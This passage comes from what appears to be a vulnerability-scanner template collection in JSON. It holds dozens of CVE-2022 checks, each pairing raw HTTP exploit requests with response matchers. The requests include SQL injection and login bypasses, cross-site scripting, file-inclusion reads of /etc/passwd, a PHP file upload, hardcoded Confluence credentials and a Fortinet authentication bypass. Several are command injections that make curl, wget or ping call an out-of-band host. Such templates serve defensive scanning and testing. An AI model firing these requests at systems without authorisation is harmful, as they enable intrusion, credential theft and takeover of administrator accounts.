boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5('CVE-2022-25487');?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7ee3686858eb89dd68ccf85f0ea03abe"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0747","info":{"name":"Infographic Maker iList 